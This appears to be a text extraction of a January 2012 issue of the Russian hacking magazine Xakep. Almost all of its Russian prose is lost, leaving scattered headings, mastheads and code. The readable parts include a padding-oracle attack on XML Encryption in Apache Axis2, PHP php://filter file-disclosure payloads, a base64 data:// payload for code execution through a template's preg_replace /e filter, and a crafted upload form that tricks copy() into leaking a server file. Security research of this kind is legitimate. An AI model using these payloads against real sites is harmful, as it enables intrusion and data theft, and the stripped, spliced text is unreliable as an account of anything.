Хакер 2012 01 PDF

030
x 01 (156) 2012
WWW.XAKEP.RU
01 (156) 2012

Lotus Domino Controller
ANDROID
: 230 .
XML ENCRYPTION: XML-
XML
ENCRYPTION
XML-
.
,

024
PHP
036
PHONEGAP:
HTML5
064
018
156
CODING
ALEKSANDR-EHKKERT@RAMBLER.RU
Intro
nikitozz (nikitoz@real.xakep.ru)
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)

PC_ZONE UNITS
MALWARE SYN/ACK
UNIXOID
PR-
xakep.ru

step (step@real.xakep.ru)
(magg@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
(po@kumekay.com)
(grigorieva@glc.ru)
(xa@real.xakep.ru)

DVD

Unix-
Security-

ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)

ART
-
(alik@glc.ru)

: . : .
PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906

:
, . , :
100%. ,
250 ,
. ? , , :
,
. .
. :
1-3 ,
. ,
: ,
. ,
.
, ,
, .
, .
, : .
,
, , .
:
115 !
shop.glc.ru/xakep.
, ,
. :
!
nikitozz, . .
shop.glc.ru/xakep
vkontakte.ru/xakep_mag
01/156/ 2012
.: (495) 935-7034, : (495) 545-0906

TECHNOLOGY

(filatova@glc.ru)
(olgaeml@glc.ru)
(alekhina@glc.ru)
(polikarpova@glc.ru)
( )
(tatarenkova@glc.ru)
(gospodinova@glc.ru)

(dubrovskaya@glc.ru)
-
(bulanova@glc.ru)
(korenfeld@glc.ru)

(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)
:
DVD-: claim@glc.ru.

: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002
Zapolex, . 219 833 .
.
. ,
, . .
. : content@glc.ru.
, , 2012
001
Content
004
HEADER
004
011
MEGANEWS

hacker tweets
-

SIRI
016
017

8 Dropbox AdWords
Proof-of-concept
XSS- 100
COVERSTORY
030
,
Adobe
COVERSTORY
COVERSTORY
018
024
XML
Encryption

XML

PHP
112
122
PCZONE
036
042
046
PhoneGap: HTML5

Windows-

Windows-

Windows-?
UNIXOID
102
107
112
117
050
054
060
064
068
072
Easy-Hack

MD5

- SpyEye
Lotus,
Lotus Domino Controller
X-Tools

SYN/ACK
118
122
NAS
5- 6- NAS-

Silicon
Power SP060GBSSDV30S25
PHREAKING
MALWARE
080
084

Win32/Duqu: Stuxnet
: bootkit test
BitDefender, ESET NOD32, F-Secure, Outpost Security,
Rising
126
132
094
098
.NET-

.NET Framework

,

-
Loop
,

136
139
142
088
FERRUM
130
074

Linux
!
tcpdump

Android-
- Ubuntu 11.10
Oneiric Ocelot
144
FAQ UNITED
FAQ
8.5
WWW2
web-
2012
NY2k+12
MEGANEWS
SIRI
UBUNTU

SIRI

iPhone 4S

Applidium Siri,
iOS 5. ,
. ,

Siri
. -,
Android, Siri iPad.
Applidium: applidium.com/en/news/
cracking_siri.
:
iPhone 4S
,
Speex. Siri

iPhone 4S.
\,
. ,
,
, , .
. iPhone

Apple. ,
.

Applidium

,

Siri.
,

,

Siri.
WINDOWS XP
.

,
.
004
APPLE
. ,

,
.

! comScore,

50,81
.
UBUNTU

(
Canonical, Debian,
,
Ubuntu) , Ubuntu
, .
Canonical ,
, Windows 8, , ARM-.
, . ,

. ,
Ubuntu 14.04, 2014 . ,
,
.
Canonical
Ubuntu 12.04,
2012 . , LTS-
( ),
,
.

(CHRONOPAY)
,
DDOS- (Assist),
.
, STEAM .

, ,

Steam.
01 /156/ 2012
MEGANEWS FACEBOOK , 600 .
POLAROID !

DNS

,

, DNS-.
, ,

.
DNS-
Hotmail, Gmail, Google, Microsoft
, Uol, Terra Globo. , , , google.com,
IP- Google,
-. . ,
Google
Google Defender, .
, ,
27- ,
DNS-
, DNS-.
, ,
Ghost Click.

- ,
DNS Changer. Mac OS
X Windows DNS.
IP- 15
! , , .

100 , 500
.

( ), 14 ,
. - ( - )
,
.
, , DNS-
Internet Systems Consortium.
,
Rove Digital. , .
, .
,
, .
EstDomains , , .
ICANN
2008, ,
.
. 22
.
85 .
2008
Polaroid ,
11-
.

,

Polaroid
, 11-

.
Polaroid
: Z340
Instant Digital Camera. ZINK
Zero Ink Printing,
. ,
, .
,
. , ,
,
. 14 .
2,7"
SD.
( 43 ) F/3,2.
( 1280 720 ). Polaroid Z340
76 102 , $20 30
. - ,
, , 25 .

, Polaroid. Z340 Instant Digital Camera $300.
AVIRA

AESCRIPT.DLL
006
01 /156/ 2012
07
MEGANEWS
, THE CONSUMERIST, RIAA .
!
, WI-FI,

MYBB

MyBB.
,
MyBB 1.6.4.
. ,
PHP, .
,
,
.
, ,
,
.
, CMS,
, .
, MyBB 1.6.4,
6 ,
. ,
.

.
,
.
(CDN).
, , ,
. , ,
. -, ,
10 ,

/GPS. ,
, , , , 802.11.
-,
. , ,
,
( 100 ), 802.11, .
, .
, ,
.
, - ,
.
. , - ,
.
iPhone 4S,
,

,
.
Apple
- :).
WEXLER.BOOK E7001. Wexler

WEXLER.BOOK E7001 7.0" ,
. 4
( 32
microSD) ,
, ;
FM-. - 1500 mAh, ,
.
, . WEXLER.BOOK E7001
.
: 5 990 .
008
,
GOOGLE! , Microsoft.
Bing

Firefox.
38
Interfilm.ru
Puzkarapuz.ru.

13 .
01 /156/ 2012
>> coding
MEGANEWS
ENTENSYS COMMTOUCH , 6,7% .

,

.
YouTube :
Anonymous
(Zetas)
. , ,
, ,
. , 26 2011
- . ,
- .
-.
Anonymous ,
,
. ,
,
, -
, ,
. , OpCartel (
). , , ,
,
. , ,
,
OpCartel .
.
.
, , , , .

.
.onion Hidden Wiki,
. ,
. -
,
Freedom Hosting. ...
: Freedom Hosting,
40 ,
Lolita City , 100 .

Freedom Hosting,
,
. Operation Darknet
DDoS-.
, Lolita City
SQL-.
, , ,
.
:
pastebin.com/T1LHnzEW.

Anonymous . ,
,
- 20006000
.

38
.
IT .

,

010
01 /156/ 2012
(@asintsov)
#hacker tweets
@EdiStrosar:

,
(
).
@ILLUMlNATI:
@RuCTFE:
,

.
#RuCTFE
0ldEur0pe RWTH, ,
.
t.co/lUlI94Ko.
:
@WeldPond:
@jkouns:

. Google-
.
Google,

OllyDbg IDA Pro
_noRE.exe .
:
@mikko:
IP-: http://49.2;
http://96.4; http://71.3;
http://96.99.
...
-. :)
, Google
Wi-Fi,
_nomap. :)
@insit0r:
0day BIND.
@Rogunix:
DoS/PoC- ICMP refCount

TCP/IP (MS11-083) 2^32
UPD-, , 250 52 .
t.co/QYPCMyRy.

Microsoft/MSRC.
!
Google. ++.

DNS- BIND,
DoS 0day.
Shodan ,
Siemens Simatic.
t.co/L1QDb3cq.
:
. SCADA
. SCADA- .
EMET,
, , . !
01 /156/ 2012
@Stephenwest:
How to do a pentest:
1. Draw line with pen.
2. Check line.
3. If visible, pen works.
4. If no line, pen does not work.
:
- .
pentest?
1. (pen) .
2. .
3. , , .
4. , , .
@WeldPond:
@fjserna:
CTF .
@csoghoian:
Chrome silentlyInstall()
. , FBI .
t.co/5EhY8AUC.
@jduck1337:
: bash: ./:
.
@j00ru:
@mikko:

,
: .
#worstpassword

Windows (NT/2000/
XP/2003/Vista/2008/7/8).
: t.co/oBHiB76O.
:

, . ? :)
011
( 926 ), ,
.
MEGANEWS

Nitro,
,

.

.
Stuxnet, , - ,
, .
, ,
Symantec. ,
Nitro,
,
. 29 19 ,
(,
). ,
.
, .
( Poisonlvy).
, .
Symantec ,
. Nitro :
, .

.
,
.
012
SUP
.
,

.
GOOGLE,
Android,
18,7%,

Opera Mini,
13,1%.
,
!
. , , .
, ? ,
, . ,
.
VideoGhost,
.
,
, (
- 2 ). VideoGhost
,
USB-. USB- -, .
USB-,
VideoGhost.
VGA, DVI HDMI,
$200.
FACEBOOK.
Trusted Friends

.

XXX.
ICANN

.
01 /156/ 2012
MAIL.RU GROUP , Twitter. , .
BITCOIN
PC ANDROID'

,
BITCOIN
BitCoin
.
,
, . ,
Mt Gox, BitCoin,
, . , BitCoin
, ,
,
.
Intego,
,
DevilRobber, BitCoin.
.
,
, ,
, ,
BitCoin, ,
.
DevilRobber Mac OS X,
.
The Pirate Bay . ,
Graphic Converter Mac OS X.
,
. , DevilRobber
BitCoin-, .
Mac. DevilRobber ,
Safari Vidalia
Firefox, TOR.
, DevilRobber , ,
.
BitCoin
.
Microsoft , . ,

BitCoin.
: 1
2, , 50 , 1 .

, , .
,
, ,
BitCoin. - .
, .
, .

, .
, BitCoin, :
, ,
- .
FXI ,
The Cotton
Candy
$200,

2012 .
, Windows 8
.
FXI . The Cotton Candy

( ,
21 , , ).
USB-, . ARM- Samsung Exynos 1,2 (
, Samsung Galaxy S II), Mali-400 MP, microSD ( 64 ),
Wi-Fi Bluetooth, HDMI 2.1 USB 2.0. ,
1080p. The Cotton Candy
Android 2.3.
, , ,
Android. .
HDMI, USB (
). Bluetooth ,
.
Android Market,
.
, GOOGLE ?
SSID
_NOMAP,

GOOGLE
01 /156/ 2012
013
MEGANEWS
LINUX 3.1, kernel.org .
ADOBE
FLEX
FLASH
,

,
, !
, , .
, , , . iSpy 100%.
, ,

iPhone Android
(magnified keys). iSpy
, ,
- !
,
.
,
60 .
90 % . ,
. , ,
.
DSLR-
12 . iSpy magnified key -
.

Adobe Flash
750 ( 7
% )

.
dobe
Flash Player. Flash
, Adobe AIR
. Android PlayBook,
. Flash Player

HTML5.
, Flash. , ,
Apple, , - Flash Player iOS.
, Flash Player Apple iOS , . Adobe Flash
Apple.
,
Flex SDK. Flex 4.6 SDK, 29 , open source.
.
DARPA
Shredder Challenge

. , .
50 .
014
AMAZON
.
, 2012
.
GOOGLE

42 47
.
01 /156/ 2012
500 Wikimedia.
IPHONE

iPhone Dev-Team

iPhone 4S.

,

.

,
,
.
iPhone 4S ,

. Chronic Dev Team iPhone
. , , ,
iPhone,
AT&T, .
, , ,
, iPhone 4S, iPhone
: iPhone 4 iPhone 3GS, . ,
,
. , ,
. : SIM-
AT&T, ,
, . AT&T
( , ,
, ).
, youtu.be/gofpelTXI5U. :
AT&T (611)
;
;
SIM- AT&T T-Mobile;
, Wi-Fi (
,
);
,
iPhone ;
;
EDGE
E;
2030 ;
iPhone,
;
,
;
SIM-,
;
SIM- T-Mobile
.

. , iPhone T-Mobile,
.
MCAFEE:

75

01 /156/ 2012
015
HEADER
Proof-of-Concept
XSS-
100
, PoC.
, SQL-,
, ,
. , , sqlmap, SQLi
. PoC ,
XSS- . .
Damn Small XSS Scanner (DSXS).
XSS
. Cross-site scripting (XSS)
, JS-.

.
XSS- .
- , ,
,
HTTP-.
.
,
XSS-.
XSS- .
,
-
.

HTML-
GET/POST-.
(
),
.
,
,
XSS-. ,
-
. ,
. ,

HTML- <script>..</script> (
),
JavaScript-. ,
,
HTML- <a href="...">,

> JS-, <script>...</script>.
DSXS
XSS
zero.webappsecurity.com
016
, XSS . ? Python,
GET- POST- XSS-,

. Damn Small XSS
Scanner (DSXS) ,
-, .

, ,
. ,
,

<a href="...">, ,
> -
. DSXS
,
. , DSXS ,
.
,
.
(
,
),

. ,

. , ,
User-Agent, Referer
Cookie HTTP-. GitHub (https://github.com/
stamparm/DSXS). z
01 /156/ 2012
HEADER

10 DROPBOX
ADWORDS
10 2
Dropbox , , ][,
.
2 ,
50 ,
. $99,00 . ,
,

250 . ,
10 , ,
- . , , Dropbox,
MAC-. , ,
(, bit.ly/und69i). ,
, Dropbox - , , . ,
,
10 , Dropbox
. AdWords !
?
,
(bit.ly/rxNKyB).
,
Dropbox-.
, .
? , ,
. . ,
AdWords,
.
? . ,
! , Google, 1000 .
. . bit.
ly/rAEsg1 $75
AdWords, , . :) , e-mail (
- ), (
- about.me), .
e-mail. ( ).
.
( ):
1. .
2. (, Dropbox).
3. ,
(, , ,
, ).
3. : , 600
.
. ,
.
: dropbox, free online storage,
online backup free, online backup, online backup data, dropbox space.
, ,
Google. URL ,
Dropbox Referall Status (,
http://db.tt/UfxuF8m). , .
, , .
,
. ,
CPC (Cost-Per-Click). , .
, ,
. :)
? -,
Dropbox. -, .
-, AdWords, , , (
Google). . :) z
?
? , ,
Google AdWords (adwords.google.com).
.
( ,
, ),
01 /156/ 2012
250 Dropbox
017
000, 00spersky Lab

|plaintext| (first@plaintext.su, www.plaintext.su)
COVERSTORY
XML
Encryption

XML-

BEAST Padding Oracle Attack
.NET Framework,

XML
Encryption,
XML-.

CBC

.
018
WWW
www.w3.org/TR/
xmlenc-core/
XML Encryption

W3C.
bit.ly/qMupEv

,
XML
Encryption.
XML ENCRYPTION
XML Encryption, W3C 2002
, XML
Framework ( .NET, Apache Axis2,
JBOSS . .).
- , Microsoft Red Hat.
XML Encryption ,
XML- , ,
XML-
. , .
, AES 3DES CBC. AES (
, CBC).
01 /156/ 2012
XML Encryption
,
( 16 , 128 )
. ,
, CBC.
.

(IV),
XOR,
.
,

:
//
C[0] = AES_ENC(k, IV xor M[0]);
C[i] = AES_ENC(k, C[i-1] xor M[i]);
//
M[0] = AES_DEC(k, C[0]) xor IV;
M[i] = AES_DEC(k, C[i]) xor C[i-1];
k , , , IV
().
CBC,
.
, , :

,
. ,
, 12
0x05. ( 16 ),
, 15
, 16- 0x10.

, XML Encryption.
CBC ( )
01 /156/ 2012
, BEAST Padding
Oracle Attack.
. .
CBC ,
,
XOR IV
MSK, (IV xor MSK, C[0]) M[0] xor MSK. ,
.
,
MSK,

,
. ,
.
,
, . XML Encryption
, .
, , , ASCII. ASCII .
, NULL ( ),
( B). , , B,
. ,
,
. ,
, 16 ,
true, M[0] = AES_DEC_
CBC(k, (IV, C[0])) NULL, false
.
, , .
:
1. IV1, (IV1, C[0]) .
nIV, (nIV, C[0]). true,
IV1 = nIV, false .
019
COVERSTORY
WS-SECURITY
WS-Security
SOAP,
-. WS-Security XML Encryption XML
Signature.
,
23 , , ,
.
2.
(, AES_DEC ,
). :
msk = 0
repeat

,

3. X[0] ,
M[0].
XOR X[0]
IV.
. .
XML XML ENCRYPTION

msk++
IV2 = IV1 xor (0...0||msk||0...0)
// msk j-
until Server((IV2, C[0])) == true
return X[j] = ASCIICode(NULL) xor IV2[j]
// ""
:
Input:
C=(IV1, C[0]), j
Output:
j- X[j]
X = AES_DEC(k, C[0])
. j-
, ,
j-
. , ? : CBC.
(
):
AES_DEC_CBC(k, (IV2, C[0])) = IV2 xor AES_DEC(k, C[0]) =
IV2 xor X[0].
Extensible Markup Language ( XML)

.
XML , < >
(node).
, , XML < > . & escape- &.
XML XML Encryption.
W3C XML Signature W3C
XML Encryption, XML
(
, . .) XML.
XML Encryption,
. ,
,
( , , . .).
<CipherValue>, , , .
.
<EncryptedData>.
, ,
. <CipherValue> .
XML Encryption
020
01 /156/ 2012
XML Encryption
,
<EncryptionMethod>.
,
XML-.
, XML-, . ? :-)
XML Encryption XML- ( XML),
.
Type <EncryptedData>. Encrypted Element , XML-
. Encrypted Content ,

, , . . Encrypted Text Content,
Encrypted Content,
,
. , Type . ,
XML Framework .
. XML Encryption UTF-8,
,
.
UTF-8 , ,
(line feed)
(carriage return). ,
ASCII UTF-8.
, ASCII
128 ( 4). ,
,
.
AXIS2
-
-.
Apache Axis2 Framework,
Rampart WS-Security.
XML Encryption XML
Signature SOAP.
Axis2
Framework, (message flow). (message flow)
,
SOAP- ( ),
. SOAP-
, Message
Receiver, , ,
Service .
Axis2
: Transport, Security Dispatch. Security,
XML SIGNATURE
XML Signature W3C,

XML.
01 /156/ 2012
?
Provable Security,

. ,
,
,
. . ,
(, , -,
, .).
-,
,
, . Axis2,
, -.
Padding Oracle Attack,
(-, ASP.NET),
.net.
, .

,
XML SOAP-.
Dispatch. Message
Receiver, message flow
SOAP ,
.
,
Axis2. :-)
AXIS2
-,
Axis2. ,
,
true false .
security fault. security fault
:
1.
. , ,
,
? ,
0x01 0x10,
.
2.
.
,
ASCII 0x00 0x1F ( 0x09,
0x0A, 0x0D , ).
XML- , &
(0x26) < >.

.
,
ASCII (
). A
XML & <,
B .
021
COVERSTORY
. ,
, , , CBC, 16-
, true
false. , SOAP, . ,
true, SOAP(AES_ENC_CBC(k, (IV, C)))
security fault, false .
, security fault,
, M XML-:
PAD(M) == (IV xor AES_DEC(k, C))
:
1. M, XML- <a>,
</a>.
2. M &,
escape-,
&gt.
3. M B.
security fault, ,
.

, , . .
C=(IV, C[1], ... , C[d]),
.
, CBC
[i] C[i-1].
,
ASCII ( UTF-8). ,
,
,
B ,
0x01 (
).
-
-
.
W3C web-service ,
machineto-machine-.

-
.
WSDL (Web Services Description Language), XML. -
,
RPC (Remote procedure calls,

), SOA (Service-oriented architecture,
) REST (Representational state transfer).
GET, POST, PUT, DELETE . .
HTTP, .
022
Message flow Apache Axis2

. (FindIV)
. = (IV, C[1], ... , C[d])
i,
C=(iv, C[i]).
, .
(FindXbyte) (
FindIV) j- X[i][j] X[i] = AES_DEC(k, C[i]). ,
.
Input: C=(C[0] = IV, C[1], ..., C[d])
Output: M=(M[1], ..., M[d])
for i = 1 to d do
iv = FindIV(C, i)
for j = 1 to 16
X[i][j] = FindXbyte(C[i], iv, j)
end for
X[i] = (X[i][1], ..., X[i][16])
M[i] = X[i] xor C[i-1]
end for
return (M[1], ..., M[d])
.
, M
CBC ( ,
). : FindIV FindXbyte.
FINDIV FINDXBYTE
FindIV , , ,
- . , .
, , ,
, , : <
IV,
0x01.
,
FindXbyte. , - , , ,

.
, , .
01 /156/ 2012
XML Encryption
ASCII

, .
( ,
)
( ). , , XML Schem
(XML-) . , ,
, , ,

. ,
,
.
( ),
.

,
,
XML Signature.
, XML Signature
Wrapping, , / MAC. ,
.
01 /156/ 2012
. -,
-, -,
.
-, , . ,
, ,
CBC, ,
(, ISO/IEC
19772:2009),
XML Encryption. , ,
OSI (, XML Encryption SSL/TLS,
BEAST).

,
, ,
, epic fail.
, XML Encryption
, side-channel,
. ,
, -
, .
Juraj Somorovsky Tibor Jager,
, . z
023
COVERSTORY
C
OVERSTORY
Pr0xor (php.m4sql@gmail.com, rdot.org/forum)
INFO

$_FILES
,

.

PHP
PHP

.
fopen, copy, file_get_
contents . .

,
,

.
024
WWW
bit.ly/sfDcys

LightningTemplate.
bit.ly/tTtvWV

LightningTemplate.
bit.ly/mdrdqf
,

File path
injection.
pastebin.com/1edSuSVN

File path
injection.

,
,
PHP 4.3
. PHP ( , . .) .
.
PHP ,
, .
,
:
print_r(stream_get_filters());
, . stream_filter_append/
bit.ly/g6ztD3
,

$_FILES.
DVD

.
phpBB3
01 /156/ 2012
stream_filter_prepend php://filter.

, ,
.
:
if($closing) {
$consumed += strlen($this->_data);
$str = nl2br($this->_data);
$this->bucket->data = $str;
$this->bucket->datalen = strlen($this->_data);
$fp = fopen('php://output', 'w');

stream_filter_append($fp,
'convert.quoted-printable-encode');
fwrite($fp, "I \v Love \v PHP.\n");
,
POST, Base64 :
readfile("php://filter/read=convert.base64-encode/
resource=php://input");
, PHP
, . , ftp-,
gz-, :
copy('compress.zlib://ftp://user:pass@ftphost.com:21/
path/file.dat.gz', '/local/copy/of/file.dat');
php://filter
-. ,
include ($_POST['inc']);
allow_url_include = Off RFI.

PHP-
POST-:
inc=php://filter/read%3Dconvert.base64-encode/resource%3D/
path/script.php
, PHP -
. !

, , ,
. -
. , nl2br. . ,
filter (
).
, .
$this->_data:
private $_data;
.........................
while($bucket = stream_bucket_make_writeable($in)) {
$this->_data .= $bucket->data;
$this->bucket = $bucket;
$consumed = 0;
}
, $closing
TRUE. :
01 /156/ 2012
Lightning Template
025
COVERSTORY
if(!empty($this->bucket->data))
stream_bucket_append($out, $this->bucket);
return PSFS_PASS_ON;
}
,
PSFS_PASS_ON. ,
. .
:
stream_filter_register('convert.nl2br_string',
'nl2br_filter');
, .

, , , .
Google Code Search.
stream_filter_register.

Lightning-Template (
), . ,
sample.html:
<html><head>
<meta charset="utf-8" />
<title>{{ title }}</title>
</head> </html>
include ("./LightningTemplate.php");
$lt = new LightningTemplate('./sample.html');
$lt->title = 'My Title';
echo $lt;
HTML-:
<html><head>
<meta charset="utf-8" />
<title>My Title</title>
</head></html>
,
HTML-. ,

include,
.
,
PHP-,
. ,
,
HTML-. :
public function filter($in, $out, &$consumed, $closing) {
while ($bucket = stream_bucket_make_writeable($in)) {
$patterns = array(
...
'/\{%\s+if\s+(.+?)\s+%\}/e',
...
);
$replacements = array(
...
"'<?php if ('. \$this->condition($1). '): ?>'",
...
);
$bucket->data = preg_replace($patterns,
$replacements, $bucket->data);
, "'<?php if,
. ,
. , ,
preg_replace
e. ,
:
{% if print_r(ini_get_all()) %}
PHP-. ,
, . , :
include ("./MYLightningTemplate.php");
$f = $_POST["file"];
readfile ($f);
, .
POST- file:
file=php://filter/read%3dconvert.lightning_template_filter/
resource%3d
data://text/plain%3bbase64,eyUgaWYgcHJpbnRfcihpbmlfZ2V0X2
FsbCgpKSAlfQ
026
,
, , ,
01 /156/ 2012
-----------------2421143106617

php_user_filter.
: filter, onCreate, onClose.
filter, :
1. $in , ,
, .
2. $out , ,
.
3. $consumed , ,
, .
4. $closing , ,
TRUE, .
filter
:
1. PSFS_PASS_ON
.
2. PSFS_FEED_ME ,
$out .
3. PSFS_ERR_FATAL (default) .
onCreate/onClose ,
. (,
), onCreate,
. onCreate FALSE
TRUE . onClose
( ).
,
stream_filter_register.
. , ,
PHP.
FILE UPLOAD
move_uploaded_file, copy.
, , . .
, -. ,
, ,
.
,
HTML-, :
<form action=upload.php method=post
enctype=multipart/form-data>
<input type=file name=uploadfile>
<input type=submit value=Upload>
</form>

Upload, POST, Content-Type
:
Content-Type: multipart/form-data; boundary=
01 /156/ 2012
POST- :
-----------------------------2421143106617
Content-Disposition: form-data; name="uploadfile";
filename="hello.txt"
Content-Type: text/plain
<?php echo 'Hello!!!'; ?>

-----------------------------2421143106617--
,
hello.txt, <?php echo 'Hello!!!'; ?>.
PHP- ,
PHP
phpseUm44, hello.txt.
,
( PHP
).
$_FILES :
Array (
[uploadfile] => Array (
[name] => hello.txt
[type] => text/plain
[tmp_name] => /tmp/phpseUm44
[error] => 0
[size] => 33
)
)
, $_FILES[uploadfile][type]
Content-Type, .
, -,
PHP, :
$_FILES["file"]["type"] == "image/gif"
,
,
.
getimagesize(). , ,
, EXIF-
, .
,
. , -
pic.php.myext PHP-.
,
,
.
PHP, $_FILES.

, ,
.
bugs.php.net ,
, - .
:) ,
/ ,
$_FILES[uploadfile]
[name]. , , -. Unix-
027
COVERSTORY
-
. Windows- .
.
. $_FILES.
Qwazar rdot.org.
BlackFan, , ,
.
. , ,
copy:
<form action="upload.php" method="POST"

enctype="multipart/form-data">
<input type="Hidden" name="MAX_FILE_SIZE"
value="10000000">
<input type="file" name="file[tmp_name][">
<input type="file" name="file[size][">
<input type="file" name="file[name][">
<input type="submit" value="submit">
</form>
$_FILES :
foreach ($_FILES["file"]["tmp_name"] as $key => $name)
{
echo "Size:".$_FILES["file"]["size"][$key]."<br/>\r\n";
echo "tmp name:".
$_FILES["file"]["tmp_name"][$key]."<br/>\r\n";
$_FILES["file"]["tmp_name"]["[name"]
copy :
$_FILES["file"]["tmp_name"][$key]
if($_FILES["file"]["size"][$key]>0 &&
$_FILES["file"]["size"][$key]<1024)
{
echo "Ok<br/>\r\n";
copy($_FILES["file"]["tmp_name"][$key],'test.txt');
}
}
, !
:
,
$_FILES ( ,
copy). , .

( upload.php), HTML-, secret.
php, , upload.php,

:
1. secret.php,
(, , <?php ?>).
2. , 1.
1.
,
:
$_FILES["file"]["size"][$key]>0

file[tmp_name][ secret.php,
1. ,
test.txt.
secret.php, txt,
, .
, ,
Content-Type (, ).
,
test.txt. !

,
move_uploaded_file copy.

. (, , , ) imagecreatefrom*/image*.
, , ,
. ,
$img = imagecreatefromjpeg($_FILES["filename"]["tmp_name"]);
imagejpeg($img, "uploads/".$_FILES["filename"]["name"]);
onCreate
028
JPEG,
EXIF- .
, -
. , ,
01 /156/ 2012
. ,
,
.
, imagecreatefrom* , , !
, ,
, . ,
base64_encode ,
, , :
$jpegimage = imagecreatefromjpeg(
"data://image/jpeg;base64," . base64_encode(
$sql_result_array['imagedata']));
imagejpeg($jpegimage);
,
, .
,
,
. , ,
.
, -,
, , copy,
imagecreatefrom*/image*, :

2009 PHP ,
.
, GPC-
(), . [ ( ).
PHP
. , HTML:
<form action=>
<input name="goodvar .[">
<input name="goodarray[foo]">
<input name="badvar[ . [">
<input type=submit>
</form>
index.php :
<?php
print_r($_GET);
?>
:
foreach ($_FILES["file"]["tmp_name"] as $key => $name) {

echo "Size:".$_FILES["file"]["size"][$key]."<br/>\r\n";
echo "tmp name:".$_FILES["file"]["tmp_name"][$key]."<br/>\r\n";
$img = imagecreatefromjpeg(
$_FILES["file"]["tmp_name"][$key]);
imagejpeg($img, './new_'.$key.'.jpg');
ImageDestroy($img);
Array
(
[goodvar___] =>
[goodarray] => Array
(
[foo] =>
)
}
[badvar_____] =>
1.jpg c ,
, ,
POST- Content-Type:
php://filter/read%3dconvert.lightning_template_filter/
resource%3d
data://text/plain%3bbase64,eyUgaWYgcHJpbnRfcihpbmlfZ2V0X2
FsbCgpKSAlfQ
Array
(
[goodvar___] =>
[goodarray] => Array
(
[foo] =>
)
[badvar_ . [] =>
)
, ! , ,
, imagecreatefromjpeg. ,
,
.
, .
$_FILES,
.
PHP
01 /156/ 2012

PHP.

, .
, - ,
, , . z
029
COVER STORY
ADOBE
.

.

Elcomsof t.
vanced eBook Processor,
Ad
1
- 200 Defcon.
030
01 /156/ 2012

,
IT, , ?
(
. . . ][), , 6.
100 . . 20
.

. ,
- ... , ,
- ,
.
.

. ,
- , . ,
, - ...
,
.
, , .
4,5 ,
6 .
91- .
, , .
,
. , .
E
01 /156/ 2012
031
COVER STORY
, ,

. , , , :
.
, ,

, .
,
, ,
, .

,
,
.
.
, .
, ,
( 97- )
. ,
,
,
IT. .
, ,
, 80 %.
Elcomsoft, .
, , ,
, . :
, .

.
,
... .

ELCOMSOFT
?
,
A .
password recovery, ,
. , ,
.
.
, .
, EFS
Recovery.
,
Active directory.
computer
forensics. ,
,
,
.
,
,
,
. ,
,

.
APPLE
,
,
? ADOBE
.
, ,
computer forensics.
, ,
. , ... Apple
,
. , ,
.
PDF
ELCOMSOFT ?
, pdf .

. : , ,
.

. ,
.

ADVANCED EBOOK
PROCESSOR, -
2001 DEFCON?
, . ,
,

pdf-, .
2001 .
,

,
. ,
, .
.
Defcon.
, ,
12 20 .
,
, ,
Adobe.
.
Defcon,
Advanced eBook Processor,
. ,
, ,
.

.
, Defcon 2001
, .

, .
.
, .
, . , ,
,
, .

.
, ,
ELCOMSOFT.
.

Access, . ,
... .
, ,
. -
,
032

. :)
, ,
.
-
, ,
. 90-

- ,
.
Elcomsoft, .

.
, .
, , , ...
A ,
Apple, iOS ( ,
iPhone 4S iPad2).
, .
, ,
? :)
01 /156/ 2012
. ,
.
, .
, , ,
,
, .
- .
,
? ?
.
,
,
21 .
,
.
,
. 11
-,
, .
,
.
, ,
, ... ,
. :) ,

, -.
,
. , ,
.
.
, ... , .
, ... ,
A
, .
Spot the fed ( ).

(, ),

,
, -
.
,
, ,
- , .
. ,
, , ,
, .
, .
Q
,
,
.
01 /156/ 2012
, ,
. ,
,
. ,
, , .
.
.

-.
. , ,
.
: ,
.
-, 11 . .
,
,
, ,
, , .
.
, , . :
, . ,
, .
,
ADOBE
?
, , -,
Adobe .
,
Adobe, . Adobe
, , . , : ,
, , . ,
.
, ,
?
, ,
Elcomsoft. ,

.
. .
, ,
.
.
033
COVER STORY
, .
,
, , , ,

. ,
. ,

.
, ( -)
50
, Elcomsoft.
, ,
, .
, .
,
.
,
, . .
,
, -
, .

. ,
2001 ,
6 , 2002
. ,
( ),
:
, ,
,
.
deposition
( )
. ,
: -
?.
, :
.
, Elcomsoft
.
. 2001
,
.
, ,
2002.
?
Elcomsoft
A ,
Public
Interest Parole. ,
, 17
Elcomsoft
.
. ,
,
. .
Q
034
? ,
, ADOBE
- ?
.
DMCA.

, .
, -
,
.
, .
,
,
.
-
, ?
?
,

. .

.
,

.
?
, ...
. , .
, , -
,
.

, .
, ,
...
, , ,
. ,
,
,
.
9 .
CONFIDENCE 2.0

CANON.
?
,
(Canon).
, Canon 300D, ,
, Canon 350D.
, Canon
, ,
, , . Canon 30D,
.
, .

Canon. ,
Magic Lantern,
Canon
,
.
Canon Hackers Developers Kit,
,
.
,
Canon ,
,
.
CONFidence 2.0. Nikon
. (usb-)
.
, , . ,

. Nikon
.
510
,
,
?
,
, Practical
cryptography
. , ,
, . ... ,
, .
,
. , .
, , .

?
,
?
, .
,
.
,
.
,
.
, . ,
, , ,
.
,
1 % ,
. ,
. ,
, IT,
- : .
,
.
, ,
,
. z
01 /156/ 2012
Preview
30 .
.
68
,

:

.
.
.
,
Lotus Domino
Controller
.
, ,
IBM
.
PC ZONE
36
HTML5
Android iOS,
? .

30 .
74

500 ,
.
.
01 /156/ 2012
46
?
,

, .
64
?
.
,
.
MALWARE
80
DUQU

,
Stuxnet.
84
BOOTKIT!
, MBR, ,
5 .
035
PC ZONE
(http://twitter.com/azproduction)
PhoneGap:
HTML5

,
,
.

todo list Android
iOS, ,
.
Objective-C Java

,
, PhoneGap.
,
Windows 8, , , ,
HTML5. , , ,
, .
,
HTML, JavaScript
CSS!, PhoneGap.
: iOS, Android,
Windows Phone, Blackberry, WebOS, Symbian Bada.

(, Objective-C iOS), API
. , , HTML5
PhoneGap API.
HTML-, , ! API

,
: , , (
), , , ( ), . . ,
- .
jQuery Mobile Sencha,
,
( ).
,
, .
.
